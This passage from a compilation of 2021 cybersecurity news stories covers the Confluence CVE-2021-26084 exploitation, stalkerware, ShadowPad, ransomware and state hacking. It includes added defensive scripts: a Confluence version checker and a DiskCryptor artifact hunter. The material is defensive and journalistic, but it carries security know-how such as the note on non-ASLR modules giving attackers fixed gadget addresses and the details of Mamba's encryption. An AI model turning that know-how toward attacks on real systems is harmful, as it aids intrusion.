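Point it at every DLL in the service's installation directory; any "NO ASLR" result is a module an attacker can use for fixed gadget or function addresses, exactly the situation Microsoft describes for Serv-U. On a live Windows host the same information is visible per loaded module in Process Explorer's ASLR column or in `dumpbin /headers` output ("Dynamic base" under DLL characteristics).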
If anything, the revelations highlight the variety of techniques and tools used by threat actors to breach corporate networks, including piggybacking on legitimate software.
Back in December 2020, Microsoft disclosed that a separate espionage group may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. Cybersecurity firm Secureworks connected the intrusions to a China-linked threat actor called Spiral.
U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw
5.9.21 BigBrothers Thehackernews
The U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.
"Mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to accelerate," the Cyber National Mission Force (CNMF) said in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Atlassian itself in a series of independent advisories.
Bad Packets noted on Twitter it "detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution."
Atlassian Confluence is a widely popular web-based documentation platform that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.
The development comes days after the Australian company rolled out security updates on August 25 for an OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.
Put differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.
The flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
The issue has been addressed in the following versions —
6.13.23
7.4.11
7.11.6
7.12.5
7.13.0
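The version ranges above are awkward to check by eye across four release lines, so the following added example (not Atlassian's code) encodes them as half-open intervals, parses a version string, reports whether it is affected and which fixed release on the same line to move to, and extracts the version from a Confluence page. The ajs-version-number meta tag is the one Confluence pages embed in their HTML head, so an unauthenticated GET of the base URL is enough for inventory; verify the tag name against your own instance. The HTML fragment is constructed, not fetched.

```python
"""Check a Confluence Server / Data Center version against the CVE-2021-26084 ranges."""
import re

# [first affected inclusive, first fixed exclusive) for each release line named in the advisory
AFFECTED_RANGES = (
    ((0, 0, 0),  (6, 13, 23)),
    ((6, 14, 0), (7, 4, 11)),
    ((7, 5, 0),  (7, 11, 6)),
    ((7, 12, 0), (7, 12, 5)),
)
FIXED_VERSIONS = ("6.13.23", "7.4.11", "7.11.6", "7.12.5", "7.13.0")


def parse_version(version: str) -> tuple:
    """'7.4.10' -> (7, 4, 10); tolerates suffixes such as '7.4.10-jira8' and two-part versions."""
    nums = re.findall(r"\d+", version)
    if not nums:
        raise ValueError(f"no version digits in {version!r}")
    return (tuple(int(n) for n in nums[:3]) + (0, 0, 0))[:3]


def is_affected(version: str) -> bool:
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def minimum_fix(version: str):
    """Smallest fixed release on the same branch, or None if the version is not affected."""
    v = parse_version(version)
    for lo, hi in AFFECTED_RANGES:
        if lo <= v < hi:
            return ".".join(str(n) for n in hi)
    return None


# Confluence pages carry <meta name="ajs-version-number" content="x.y.z"> in the head
_META = re.compile(r'<meta\s+name="ajs-version-number"\s+content="([^"]+)"', re.IGNORECASE)


def version_from_html(html: str):
    m = _META.search(html)
    return m.group(1) if m else None


def assess(html: str) -> dict:
    """Combine extraction and range check for one fetched page body."""
    v = version_from_html(html)
    if v is None:
        return {"version": None, "affected": None, "fix": None}
    return {"version": v, "affected": is_affected(v), "fix": minimum_fix(v)}


# Constructed sample page fragment, not taken from a real instance
SAMPLE_HTML = '<html><head><meta name="ajs-version-number" content="7.4.10"></head><body/></html>'

if __name__ == "__main__":
    print(assess(SAMPLE_HTML))
    for v in ("6.13.22", "6.13.23", "7.4.11", "7.11.5", "7.12.5", "7.13.0"):
        print(f"{v:8} {'affected' if is_affected(v) else 'not affected':13} fix={minimum_fix(v)}")
```

Note the gap between 6.13.23 and 6.14.0: the 6.13.x line is fixed from 6.13.23 onward, while 6.14.0 through 7.4.10 is affected again, which is exactly the kind of non-monotonic range a plain "version < 7.12.5" check gets wrong.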
In the days since the patches were issued, multiple threat actors have seized on the flaw, mass scanning for vulnerable Confluence servers and installing cryptocurrency miners on them, after a proof-of-concept (PoC) exploit was publicly released earlier this week. Rahul Maini, one of the researchers involved, described developing the CVE-2021-26084 exploit as "relatively simpler than expected."
FTC Bans Stalkerware App SpyFone; Orders Company to Erase Secretly Stolen Data
3.9.21 BigBrothers Thehackernews
The U.S. Federal Trade Commission on Wednesday banned a stalkerware app company called SpyFone from the surveillance business over concerns that it stealthily harvested and shared data on people's physical movements, phone use, and online activities that were then used by stalkers and domestic abusers to monitor potential targets.
"SpyFone is a brazen brand name for a surveillance business that helped stalkers steal private information," said Samuel Levine, acting director of the FTC's Bureau of Consumer Protection, in a statement. "The stalkerware was hidden from device owners, but was fully exposed to hackers who exploited the company's slipshod security. This case is an important reminder that surveillance-based businesses pose a significant threat to our safety and security."
Calling out the app developer for its lack of basic security practices, the agency has also ordered SpyFone to delete the illegally harvested information and to notify device owners that the app had been secretly installed on their phones.
SpyFone's website advertises the company as the "World's Leading Spy Phone App," and claims five million installations. Like other stalkerware services, SpyFone allowed purchasers to surreptitiously track photos, text messages, emails, internet browsing histories, real-time GPS locations, and other personal information stored on the devices. The apps also included a feature to remove the app's icon from the mobile device's home screen, hiding from the victim the fact that they were being monitored.
On top of that, the company is said to have not implemented adequate protections to secure amassed data, thus leaving the personal information it stored unencrypted, in addition to exposing the data over the internet without any authentication and transmitting purchasers' passwords in plaintext. Notably, the company suffered a data breach in August 2018 after a researcher accessed the company's poorly-protected Amazon S3 bucket and obtained the personal data of roughly 2,200 consumers.
The development comes almost two years after the FTC barred Retina-X and its developers from selling stalkerware apps that were illegitimately used to spy on employees and children and were installed on the victims' devices without their knowledge or permission by circumventing smartphone manufacturer restrictions, thereby exposing the devices to security vulnerabilities and likely invalidating manufacturer warranties.
CISA Adds Single-Factor Authentication to the List of Bad Practices
3.9.21 BigBrothers Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added single-factor authentication to the short list of "exceptionally risky" cybersecurity practices that could expose critical infrastructure as well as government and private-sector entities to devastating cyberattacks.
Single-factor authentication is a method of signing users in to websites and remote systems by using only one way of verifying their identity, typically a combination of username and password. It's considered low-security, since it relies heavily on "matching one factor — such as a password — to a username to gain access to a system."
But with weak, reused, and common passwords posing a grave threat and emerging as a lucrative attack vector, the use of single-factor authentication can lead to unnecessary risk of compromise and increase the possibility of account takeover by cybercriminals.
With the latest development, the list of bad practices now encompasses —
Use of unsupported (or end-of-life) software
Use of known/fixed/default passwords and credentials, and
Use of single-factor authentication for remote or administrative access to systems
"Although these Bad Practices should be avoided by all organizations, they are especially dangerous in organizations that support Critical Infrastructure or National Critical Functions," CISA said.
"The presence of these Bad Practices in organizations that support Critical Infrastructure or NCFs is exceptionally dangerous and increases risk to our critical infrastructure, on which we rely for national security, economic stability, and life, health, and safety of the public," the agency noted.
Furthermore, CISA is considering adding a number of other practices to the catalog, including —
Using weak cryptographic functions or key sizes
Flat network topologies
Mingling of IT and OT networks
Everyone's an administrator (lack of least privilege)
Utilization of previously compromised systems without sanitization
Transmission of sensitive, unencrypted / unauthenticated traffic over uncontrolled networks, and
Poor physical controls
ShadowPad Malware is Becoming a Favorite Choice of Chinese Espionage Groups
20.8.21 BigBrothers Thehackernews
ShadowPad, an infamous Windows backdoor that allows attackers to download further malicious modules or steal data, has been put to use by five different Chinese threat clusters since 2017.
"The adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors," SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said in a detailed overview of the malware, adding "some threat groups stopped developing their own backdoors after they gained access to ShadowPad."
The American cybersecurity firm dubbed ShadowPad a "masterpiece of privately sold malware in Chinese espionage."
A successor to PlugX and a modular malware platform since 2015, ShadowPad catapulted to widespread attention in the wake of supply chain incidents targeting NetSarang, CCleaner, and ASUS, leading the operators to shift tactics and update their defensive measures with advanced anti-detection and persistence techniques.
More recently, attacks involving ShadowPad have singled out organizations in Hong Kong as well as critical infrastructure in India, Pakistan, and other Central Asian countries. Although primarily attributed to APT41, the implant is known to be shared among several Chinese espionage actors such as Tick, RedEcho, RedFoxtrot, and clusters dubbed Operation Redbonus, Redkanku, and Fishmonger.
"[The threat actor behind Fishmonger is] now using it and another backdoor called Spyder as their primary backdoors for long-term monitoring, while they distribute other first-stage backdoors for initial infections including FunnySwitch, BIOPASS RAT, and Cobalt Strike," the researchers said. "The victims include universities, governments, media sector companies, technology companies and health organizations conducting COVID-19 research in Hong Kong, Taiwan, India and the U.S."
The malware functions by decrypting and loading a Root plugin in memory, which takes care of loading other embedded modules during runtime, in addition to dynamically deploying supplementary plugins from a remote command-and-control (C2) server, enabling adversaries to incorporate extra functionality not built into the malware by default. At least 22 unique plugins have been identified to date.
The infected machines, for their part, are commandeered by a Delphi-based controller that's used for backdoor communications, updating the C2 infrastructure, and managing the plugins.
Interestingly, not only is the feature set made available to ShadowPad users tightly controlled by its seller, but each plugin is sold separately rather than as a full bundle containing all of the modules; of the roughly 100 samples analyzed, most embed fewer than nine plugins.
"The emergence of ShadowPad, a privately sold, well-developed and functional backdoor, offers threat actors a good opportunity to move away from self-developed backdoors," the researchers said. "While it is well-designed and highly likely to be produced by an experienced malware developer, both its functionalities and its anti-forensics capabilities are under active development."
Hackers disrupted live broadcasts at Channel Nine. Is it a Russian retaliation?
29.3.2021 BigBrothers Securityaffairs
A cyber attack has disrupted the Australian broadcaster Channel Nine's live broadcasts; the company was unable to transmit its Sunday morning news program.
A cyber attack has hit the Australian Channel Nine's live broadcasts, causing the disruption of its operations. The broadcaster was unable to air its Sunday morning news program, which runs from 7:00 am to 1:00 pm from Sydney.
The 5:00 pm news program, which is transmitted from Melbourne, did not go to air either.
“We wish to inform you there has been a cyber attack on our systems which has disrupted live broadcasts out of Nine Sydney,” reads an email sent by the company to staff. “Our IT teams are working around the clock to fully restore our systems which have primarily affected our broadcast and corporate business units.”
The company confirmed that the unprecedented cyberattack impacted the Nine IT network, while its email systems did not appear to be affected.
Internal staff worked hard to resume the normal broadcast schedule, and the 6:00 pm news program went to air as usual from the studio in Melbourne. The broadcaster hopes to completely resume all its programs by Monday morning; in the meantime, it has asked its personnel to work from home.
“A source, who did not want to be identified as he was not allowed to speak to media, said Nine management had informed staff that a “malicious” cyber attack was suspected to be the cause.” reported ABC news. “The Australian Financial Review, which is also owned by Nine, also reported that the media company was likely the target of a cyber attack, the effects of which could last beyond Sunday.”
In an update to Melbourne viewers, Nine’s Alicia Loxley confirmed that the broadcaster was hit with a massive ransomware attack.
“Cyber hackers have targeted Channel Nine in a massive ransomware attack bringing down its network Australia-wide. No-one has claimed responsibility for the bug but IT experts are working to bring systems back on-line.” said Loxley.
According to TV Blackbox, the attack was launched by Russian hackers intending to prevent Monday's episode of Under Investigation, which focuses on Russian president Vladimir Putin, from going to air.
However, the episode of Under Investigation is pre-recorded and will go to air as planned on Monday.
One circumstance suggesting that Channel Nine was the victim of a retaliatory act is that, according to sources cited by TV Blackbox, there have been no demands for money, which is very unusual for a ransomware attack.
US Gov Executive Order would oblige to disclose security breach impacting gov users
29.3.2021 BigBrothers Securityaffairs
According to a proposed executive order of the Biden administration, software vendors would have to disclose breaches to U.S. government users.
The Reuters agency revealed that an executive order proposed by the Biden administration will oblige software vendors to notify their federal government customers if they suffer a security breach.
The executive order is expected to be released next week and will also require federal agencies to enhance their security posture through the implementation of measures such as multi-factor authentication and data encryption. The order appears to be part of the US government's response to the recently disclosed SolarWinds supply chain attack.
“A planned Biden administration executive order will require many software vendors to notify their federal government customers when the companies have a cybersecurity breach, according to a draft seen by Reuters.” reads the report published by Reuters. “A National Security Council spokeswoman said no decision has been made on the final content of the executive order. The order could be released as early as next week.”
When a security breach impacts critical programs, the vendors might be forced to provide a "software bill of materials."
The order will force victims of a security breach to work with the FBI and the Homeland Security Department’s Cybersecurity and Infrastructure Security Agency to respond to incidents.
The order would also force the creation of a cybersecurity incident response board composed of representatives from federal agencies and private cybersecurity companies.
“The draft order would also create a cybersecurity incident response board, with representatives from federal agencies and cybersecurity companies. The forum would encourage vendors and victims to share information, perhaps with a combination of incentives and liability protections.” concludes Reuters.
Executive Order Would Strengthen Cybersecurity Requirements for Federal Agencies
27.3.2021 BigBrothers Threatpost
The post-SolarWinds EO could be issued as soon as next week, according to a report.
The U.S. federal government is mulling changes to up its cybersecurity software game in the wake of the sprawling SolarWinds cyberattacks that came to light in December, including requiring data-breach notifications.
In a draft executive order from President Joe Biden, software companies would be required to disclose any security issues to government users, according to a report from Reuters.
“The federal government needs to be able to investigate and remediate threats to the services it provides the American people early and quickly,” a spokeswoman for the National Security Council told the outlet. Referring to the SolarWinds incident, she noted that, “Simply put, you can’t fix what you don’t know about.”
In that campaign, adversaries were able to use SolarWinds’ Orion network management platform to infect targets by pushing out a custom backdoor called Sunburst via trojanized product updates. Sunburst was delivered to almost 18,000 organizations around the globe, starting last March, before being discovered in December. With Sunburst embedded, the attackers were then able to pick and choose which organizations to further penetrate, in a massive cyberespionage campaign that has hit nine U.S. government agencies, tech companies like Microsoft and 100 others hard.
The other draft cybersecurity orders in the EO, according to Reuters, include requiring a “software bill of materials” for all packages in use across the government, detailing the source of all code, including open-source and partner pieces. And, it would mandate the use of multifactor authentication and data encryption for federal agencies.
The order as it now stands would also require vendors to keep digital records and work with the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) on incident response, according to the report.
And finally, the draft order would create a cybersecurity incident-response board, which would have a mission of information-sharing. The board would bring together federal representatives and cybersecurity researchers to host a forum for vendors; and, it would offer both incentives and liability protections to encourage participation, according to Reuters.
The NSC spokeswoman said that the EO could be released as quickly as next week, but that final decisions on what exactly will go into it have yet to be made.
German Parliament Bundestag targeted again by Russia-linked hackers
27.3.2021 BigBrothers Securityaffairs
Several members of the German Parliament (Bundestag) and other members of the state parliament were hit by a targeted attack allegedly launched by Russia-linked hackers.
German newspaper Der Spiegel revealed that email accounts of multiple members of the German Parliament (Bundestag) were targeted with a spearphishing attack.
The messages were sent by the threat actors to the private email accounts of the German politicians. The attackers are suspected to be members of the group tracked as Ghostwriter, which operates under the control of the Russian military intelligence service GRU.
“The Bundestag has again become the target of alleged Russian hackers. According to SPIEGEL information, the computers of at least seven members of the Bundestag were attacked.” states the report published by Der Spiegel. “The attack by the group called “ghostwriters” is said to have been carried out via so-called phishing emails to the private email addresses of politicians, ie messages from supposedly trustworthy senders whose aim is to hijack the entire account.”
At this time it is not clear whether the attackers were able to steal sensitive data during the intrusion.
Seven members of the German federal parliament (Bundestag) and 31 members of German regional parliaments were hit by the attack; most of them belong to the CDU/CSU and SPD parties.
Frank Bergmann, a spokesman for the Bundestag, told The Record that the attack did not impact the infrastructure of the German Bundestag. Once the attack was uncovered, the German authorities notified the impacted politicians.
Der Spiegel also reported that the threat actors, according to government circles, also targeted political activists in Hamburg and Bremen.
In August, researchers from FireEye reported that the GhostWriter group was behind a disinformation campaign that started at least as early as March 2017 and is aligned with Russian security interests.
Unlike other disinformation campaigns, GhostWriter does not spread through social networks; instead, the threat actors behind it abused compromised content management systems (CMS) of news websites or spoofed email accounts to disseminate fake news.
The attackers typically replaced existing legitimate articles on the sites with fake content rather than creating new posts.
The attackers were spreading fabricated content, including falsified news articles, quotes, correspondence, and other documents designed to appear as coming from military officials and political figures in the target countries.
According to the experts, the campaign primarily targeted audiences in specific member states of the NATO alliance, including Lithuania, Latvia, and Poland.
Ghostwriter operators focused on spreading fabricated quotes, such as a quote falsely attributed to the commander of the NATO eFP Battle Group that was used to push a narrative that 21 Canadian soldiers stationed in Latvia had been infected with COVID-19.
In October 2020, the Council of the European Union announced sanctions imposed on Russian military intelligence officers, belonging to the 85th Main Centre for Special Services (GTsSS), for their role in the 2015 attack on the German Federal Parliament (Deutscher Bundestag). The 85th Main Centre for Special Services (GTsSS) is the military unit of the Russian government also tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM).
'Russian Hackers' Again Target German MPs: Report
27.3.2021 BigBrothers Securityweek
Several German lawmakers have once again fallen victim to a cyber attack, local media said Friday, with security experts pointing the finger at Russian hackers.
Hackers used phishing emails to gain access to the computers of at least seven federal MPs and 31 lawmakers in regional parliaments, according to Der Spiegel weekly.
A spokesman for the lower house of parliament confirmed the cyber attack but said there was "currently no indication" of a direct attack on the IT infrastructure of the German Bundestag.
Security experts suspect Russia's GRU military intelligence service of being behind the hacking, Der Spiegel said, through the "Ghostwriter" group which reportedly specialises in spreading disinformation.
It remains unclear if any sensitive information was accessed, the magazine added.
Most of the lawmakers targeted come from Germany's ruling coalition parties, the CDU/CSU conservative bloc and the centre-left Social Democrats, Spiegel said.
Several political activists were also affected, Spiegel added.
German Chancellor Angela Merkel last year said she had concrete proof that Russia was targeting her in cyber attacks.
The most high-profile incident blamed on Russian hackers to date was a cyber attack in 2015 that completely paralysed the computer network of the Bundestag, forcing the entire parliament offline for days while it was fixed.
German prosecutors last month filed espionage charges against a German man suspected of having passed the floorplans of parliament to Russian secret services in 2017.
Foreign Minister Heiko Maas last week said Germany was expecting to be the target of Russian disinformation in the run-up to its general election in September, calling it "completely unacceptable". Russia denies being behind such activities.
Report: US Gov Executive Order to Mandate Data Breach Disclosure
27.3.2021 BigBrothers Securityweek
A proposed executive order would set new rules on the disclosure of data breaches that also affect United States government agencies, according to a Reuters news report.
The report said the executive order, which could be released as soon as the next week, would require software vendors to notify U.S. government customers of cyber-security breaches that also affect them.
Furthermore, the order is expected to force federal agencies to improve their security posture through the adoption of multi-factor authentication and data encryption within their environments.
When it comes to programs deemed critical, vendors might be forced to provide a “software bill of materials,” detailing program components and offering increased visibility into resources that could introduce additional vulnerabilities.
Per the order, software vendors would be asked to work together with specialized government agencies, such as the FBI and CISA, when investigating cyber-incidents.
Likely a reaction to the recent SolarWinds attacks, the order is expected to impact the interaction between major software vendors and government agencies.
More than one hundred organizations, including multiple federal agencies, have been confirmed to be affected by the SolarWinds hack, but the overall number of victims could be greater.
What's more, the SolarWinds attack is only one of many cyber-incidents involving private companies that also have a major impact on government agencies. A December 2020 cyber-attack was linked to an assault on FireEye, which tests the defenses of thousands of customers, including federal, state and local governments.
In September 2020, Tyler Technologies, which provides software and services for state and local governments, disclosed a ransomware incident. However, the company said that software hosted for its clients was not affected.
General Says Attacks by Foreign Hackers Are 'Clarion Call'
27.3.2021 BigBrothers Securityweek
The U.S. Cyber Command conducted more than two dozen operations aimed at thwarting interference in last November’s presidential election, the general who leads the Pentagon’s cyber force said Thursday.
Gen. Paul Nakasone did not describe the nature of the operations in testimony to the Senate Armed Services Committee but said they were designed “to get ahead of foreign threats before they interfered with or influenced our elections in 2020.”
A U.S. intelligence assessment released last week said that neither Russia nor any other nation manipulated votes or conducted cyberattacks that affected the outcome of the vote.
Nakasone’s appearance before the committee came as the U.S. deals with major cyber intrusions, including a breach by elite Russian hackers that exploited supply chain vulnerabilities to break into the networks of federal government agencies and private companies.
Nakasone said in his prepared remarks that Cyber Command and the National Security Agency are helping plan the Biden administration’s response to the SolarWinds intrusion and that “policymakers are considering a range of options, including costs that might be imposed by other elements of our government.”
Separately, the U.S. is working with the private sector to respond to a separate hack that exposed tens of thousands of servers running Microsoft’s Exchange email program to intrusion.
Asked by the committee chairman, Sen. Jack Reed, D-R.I., whether the intrusions represented a “new terrain,” Nakasone said both the SolarWinds and Microsoft hacks revealed “a scope, a scale, a level of sophistication that we hadn’t seen previously.”
“It is the clarion call for us to look at this differently — how do we ensure we have as a nation both the resiliency and the ability to act against these type of adversaries,” he said.
Nakasone said one challenge is that foreign state hackers have taken advantage of legal constraints that prevent U.S. intelligence agencies such as the NSA, whose surveillance is focused abroad, from monitoring domestic infrastructure for cyber threats. Hackers are increasingly using U.S.-based virtual private networks, or VPNs, to evade detection by the U.S. government.
As a result, he said, the problem is not that intelligence agencies can’t connect all the dots but rather “we can’t see all of the dots.”
“We have an inability to see everything,” he added. “We as U.S. Cyber Command or the National Security Agency may see what is occurring outside of the United States, but when it comes into the United States, our adversaries are moving very quickly. They understand the laws and the policies that we have within our nation, and so they’re utilizing our own infrastructure, our own internet service providers, to create these intrusions.”
A senior Biden administration official told reporters earlier this month that the administration was not currently seeking additional authorities to monitor U.S.-based networks. Rather, the U.S. is working to encourage better information-sharing from the private sector about cyber threats.
Private companies are typically reluctant to share information on hacks and attempted hacks with the FBI and other government agencies, mostly out of fear of the negative business fallout if it were to become public. In many cases, companies don’t even report the incidents to the government.
On Wednesday, Sen. Mark Warner, D-Va., lamented in a webinar about being unable to get support in Congress for legislation to make it mandatory for companies to disclose cyber breaches. The chairman of the Senate Intelligence Committee singled out the telecommunications sector — a big target in the SolarWinds hack — as being especially resistant.
Facebook Disrupts Spy Effort Aimed at Uyghurs
26.3.2021 BigBrothers Threatpost
The social-media giant took down legions of fake profiles aimed at spreading espionage malware.
Facebook has taken on a group of hackers in China that target the Uyghur ethnic group with cyberespionage activity.
The hacking group, known as Earth Empusa or Evil Eye, was targeting activists, dissidents and journalists involved in the Uyghur community, primarily those living abroad in Australia, Canada, Kazakhstan, Syria, Turkey and the United States, among other countries, by using fake Facebook accounts for fictitious people sympathetic to the Uyghur community. Facebook said Wednesday that the group was sending malicious links in Facebook messages that, if clicked, led to espionage-focused malware infections.
The malicious links led to look-alike domains for popular Uyghur and Turkish news sites, according to Facebook, as well as to compromised legitimate websites.
“Some of these webpages contained malicious JavaScript code that resembled previously reported exploits, which installed iOS malware known as Insomnia on people’s devices once they were compromised,” said Mike Dvilyanski, head of cyber-espionage investigations and Nathaniel Gleicher, head of security policy, writing in a joint Facebook posting.
This was all undertaken with selective targeting, according to the post: “This group took steps to conceal their activity and protect malicious tools by only infecting people with iOS malware when they passed certain technical checks, including IP address, operating system, browser, and country and language settings.”
Android Malware Attacks
Facebook took down the fake profiles, but it also found websites set up by the group that mimic third-party Android app stores, where they published Uyghur-themed applications. These included a keyboard app, a prayer app and a dictionary app, according to the posting, which were trojanized with two Android malware strains — ActionSpy or PluginPhantom.
The Uyghurs, a Turkic minority ethnic group affiliated with Central and East Asia, have previously been targeted in other mobile spyware attacks, including by an ActionSpy campaign seen as recently as June.
Analysis on the latest Android malware found that Beijing Best United Technology Co. and Dalian 9Rush Technology Co. are the developers behind some of the tooling deployed by Earth Empusa, according to Facebook.
"These China-based firms are likely part of a sprawling network of vendors, with varying degrees of operational security," the two wrote, adding that FireEye lent threat intelligence insight that informed Facebook's assessment.
“FireEye uncovered an operation targeting the Uyghur community and other Chinese speakers through malicious mobile applications that were designed to collect extensive personal information from victims including GPS location, SMS, contacts lists, screenshots, audio and keystrokes,” said Ben Read, director of analysis at Mandiant Threat Intelligence, via email. “This operation has been active since at least 2019 and is designed for long term persistence on victim phones, enabling the operators to gather vast amounts of personal data.”
He added that FireEye believes the activity is state-sponsored. “On several occasions, the Chinese cyber espionage actors have leveraged mobile malware to target Uyghurs, Tibetans, Hong Kong democracy activists and others believed to be threats to the stability of the regime,” he said.
FBI published a flash alert on Mamba Ransomware attacks
26.3.2021 BigBrothers Securityaffairs
The Federal Bureau of Investigation (FBI) issued an alert to warn that the Mamba ransomware is abusing the DiskCryptor open source tool to encrypt entire drives.
The Federal Bureau of Investigation (FBI) published an alert to warn that the Mamba ransomware is abusing the DiskCryptor open-source tool (aka HDDCryptor, HDD Cryptor) to encrypt entire drives.
Mamba ransomware was one of the first malware families seen in public attacks that encrypted entire hard drives rather than individual files: it leverages a disk-level encryption strategy instead of the conventional file-based one.
The first sample of Mamba ransomware discovered in the wild used the full disk encryption tool DiskCryptor to strongly encrypt the data. DiskCryptor allows users to encrypt all disk drives, including the system partition; it is an alternative to Microsoft's BitLocker.
Mamba was first spotted in September 2016, when experts at Morphus Labs discovered the infection of machines belonging to an energy company in Brazil with subsidiaries in the United States and India.
The researchers shared a detailed analysis on Security Affairs, explaining that once the malware has infected a Windows machine, it overwrites the existing Master Boot Record with a custom MBR and encrypts the hard drive using the DiskCryptor tool.
According to the flash alert published by the FBI, the Mamba ransomware was employed in attacks against local governments, public transportation agencies, legal services, technology services, industrial, commercial, manufacturing, and construction businesses.
“Mamba ransomware weaponizes DiskCryptor—an open source full disk encryption software— to restrict victim access by encrypting an entire drive, including the operating system. DiskCryptor is not inherently malicious but has been weaponized.” reads the alert published by the FBI. “Once encrypted, the system displays a ransom note including the actor’s email address, ransomware file name, the host system name, and a place to enter the decryption key.”
The ransomware is simple: it consists of the open-source, off-the-shelf disk encryption software DiskCryptor wrapped in a program that installs and runs the disk encryption in the background, using a key provided by the attacker, before restarting the machine. Once the encryption process is completed, the system is restarted again and the malicious code displays the ransom note to the victim.
The ransom note includes information such as host system name, the threat actor’s email address, the ransomware file name, and indications on where to enter the decryption key. Furthermore, victims are told to contact the attackers by email to receive information on how they can pay a ransom to receive the decryption key.
“The attacker passes the encryption key via the command-line parameter: [Ransomware Filename].exe . The ransomware extracts a set of files and installs an encryption service. The ransomware program restarts the system about two minutes after installation of DiskCryptor to complete driver installation.” continues the alert.
The malware saves the encryption key and the shutdown-time variable in a configuration file named myConf.txt. That file remains readable until the second system restart, roughly two hours later, which completes the encryption and brings up the ransom note on the infected system.
According to the alert, if any of the DiskCryptor files is detected, defenders can attempt to recover the system without paying: check whether myConf.txt is still accessible and, if it is, retrieve the password from it. The window closes when the system reboots for the second time, so the file should be copied off the host as soon as the artifacts are found.
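As an added example (not the FBI's or DiskCryptor's code), the following Python script turns the alert's recovery advice into a repeatable hunt: it walks a filesystem root for DiskCryptor components, copies out myConf.txt while it is still readable, and reports the result as JSON. The component file names (dcrypt.exe, dcrypt.sys, dccon.exe, dcapi.dll, dcinst.exe) are taken from the upstream DiskCryptor project and are an assumption here, since the alert excerpt above names only myConf.txt; the sample directory tree and the contents of the config file are constructed for the demonstration and do not reflect the real file format.

```python
"""Added example: hunt for DiskCryptor artifacts and pull myConf.txt while it is
still readable. Not the FBI's tooling; component file names are an assumption."""
import json
import tempfile
from pathlib import Path

# DiskCryptor's upstream component names. Assumption: the alert excerpt above
# does not list them; treat this set as a starting point, not a complete IOC list.
DISKCRYPTOR_FILES = {"dcrypt.exe", "dcrypt.sys", "dccon.exe", "dcapi.dll", "dcinst.exe"}
# The configuration file the alert says holds the key and the shutdown time.
CONFIG_FILE = "myconf.txt"


def hunt_diskcryptor(root: Path) -> dict:
    """Walk `root`, record DiskCryptor components and copy out any readable myConf.txt.

    Returns a JSON-serialisable dict so the result can be forwarded to a SIEM.
    `recovery_window_open` is True only if a myConf.txt could actually be read,
    i.e. the second reboot has not yet finished the encryption.
    """
    findings = {"components": [], "config": [], "recovery_window_open": False}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        name = path.name.lower()  # NTFS is case-insensitive; compare lowercased
        if name in DISKCRYPTOR_FILES:
            findings["components"].append(str(path))
        elif name == CONFIG_FILE:
            entry = {"path": str(path), "readable": False}
            try:
                # Capture the raw contents now; do not wait for a full triage.
                entry["content"] = path.read_text(errors="replace")
                entry["readable"] = True
                findings["recovery_window_open"] = True
            except OSError as exc:
                entry["error"] = str(exc)
            findings["config"].append(entry)
    return findings


def build_sample_tree(root: Path) -> None:
    """Constructed layout imitating a host mid-encryption (sample data, not real)."""
    install_dir = root / "Program Files" / "DiskCryptor"
    install_dir.mkdir(parents=True)
    (install_dir / "dcrypt.exe").write_bytes(b"MZ")
    (install_dir / "dcrypt.sys").write_bytes(b"MZ")
    (root / "Users" / "Public").mkdir(parents=True)
    # Placeholder contents: the real layout of myConf.txt is not documented here.
    (root / "Users" / "Public" / "myConf.txt").write_text("CONSTRUCTED-KEY-PLACEHOLDER\n")


def demo() -> dict:
    """Run the hunt against the constructed tree and against an empty tree."""
    with tempfile.TemporaryDirectory() as infected, tempfile.TemporaryDirectory() as clean:
        build_sample_tree(Path(infected))
        return {"infected": hunt_diskcryptor(Path(infected)),
                "clean": hunt_diskcryptor(Path(clean))}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a live host the root would be the mounted system drive and the JSON forwarded off-box before the second reboot; because the file disappears from view once encryption completes, the script records the raw contents rather than trying to parse a key field whose format it cannot verify.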
The alert provides a list of mitigations to stay protected from ransomware families:
Recommended Mitigations
• Regularly back up data, air gap, and password protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
• Implement network segmentation.
• Require administrator credentials to install software.
• If DiskCryptor is not used by the organization, add the key artifact files used by DiskCryptor to the organization’s execution blacklist. Any attempts to install or run this encryption program and its associated files should be prevented.
• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (i.e., hard drive, storage device, the cloud).
• Install updates/patch operating systems, software, and firmware as soon as they are released.
• Use multifactor authentication where possible.
• Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.
• Disable unused remote access/RDP ports and monitor remote access/RDP logs.
• Audit user accounts with administrative privileges and configure access controls with least privilege in mind.
• Install and regularly update anti-virus and anti-malware software on all hosts.
